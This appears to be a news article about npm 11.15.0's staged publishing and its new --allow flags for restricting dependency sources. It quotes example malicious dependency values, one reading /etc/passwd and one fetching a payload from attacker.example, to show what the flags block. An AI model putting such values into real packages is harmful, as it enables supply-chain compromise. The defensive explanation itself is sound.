GitHub: npm 11.15.0 introduces staged publishing and three new install-time --allow flags for supply chain hardening

GitHub announced two related npm registry security improvements on May 22, 2026, at 18:27 UTC: staged publishing as a new mechanism for the publish workflow, and three new install-time flags (—allow-file, —allow-remote, —allow-directory) for granular control over dependency sources in npm install. Both are available from npm CLI version 11.15.0, which was published simultaneously.

What is staged publishing and how does it change the workflow?

The old npm publish workflow was atomic: the moment a maintainer ran the command with their publish token, the package was immediately available globally for installation through all npm registry mirrors. This model produced approximately two incidents per year — compromised publish tokens published malicious packages that spread to thousands of CI pipelines before anyone detected them.

Staged publishing adds an intermediate step. After npm publish the package enters a staging state visible only to the authenticated maintainer. The maintainer can install it for their own testing (npm install package@staged), review metadata through npm view package --tag staged, and then explicitly run npm promote [email protected] to make the package publicly available. Without a promote step, the package expires from staging after 7 days and is automatically deleted.

The workflow is optional in the current version, but the package owner can set "publishConfig.staged": true in package.json to make all future publishes staged by default. Large packages (React, Vue, Next.js) have already announced they will switch to staged publishing by default during July 2026.

What do the three new —allow flags do?

npm install previously accepted dependencies from several sources without explicit configuration by default: local file: paths, http(s) tarball URLs, and workspace directory references. This meant that the package.json of a compromised public package could contain a dependency like "internal-helpers": "file:/etc/passwd" or "auth": "https://attacker.example/payload.tgz" — and npm install would install them without warning.

Three new flags now explicitly control those sources:

• --allow-file permits file: dependencies (e.g., for local monorepo workspaces that do not use npm workspaces).
• --allow-remote permits http(s) tarball URLs (e.g., for internal package registries not hosted in the npm scope).
• --allow-directory permits workspace folder references.

In CI environments (when CI=true in env), all three flags are off by default, meaning npm install fails with a clear error message if package.json contains such a dependency. The required flag must be explicitly enabled in the CI script to proceed. In local dev environments (CI not set), the flags are on by default for backward compatibility — but a maintainer’s team can set npm config set allow-file false in .npmrc to enforce strict mode locally as well.

How does this fit into broader npm supply chain security?

These mechanisms build on existing npm security features: npm audit (dependency vulnerability scanning), provenance attestations (cryptographic link between a package and its GitHub Actions build), and mandatory 2FA for maintainers of packages with more than 1,000 weekly downloads. Staged publishing is a second layer protecting against compromised tokens; —allow flags are a third layer protecting against malicious dependency injection.

GitHub announced in the same post that during summer 2026 it will publish a npm-policy.json schema that will allow enterprise tenants to centrally define which dependency sources are acceptable for their repositories, and that CI systems (GitHub Actions, GitLab CI, CircleCI) will integrate enforcement at the pipeline level. A pre-release draft of the schema is available in the npm/cli GitHub repository.

What is the compatibility with previous versions?

npm 11.15.0 is compatible with Node.js 22 LTS and newer. The staged publishing endpoint on the npm registry is available to all clients, but older npm CLI versions do not understand the command — maintainers who want the staged workflow must upgrade. The —allow flags are new CLI arguments — older versions will ignore them or report an unknown option warning, which does not break backward compatibility.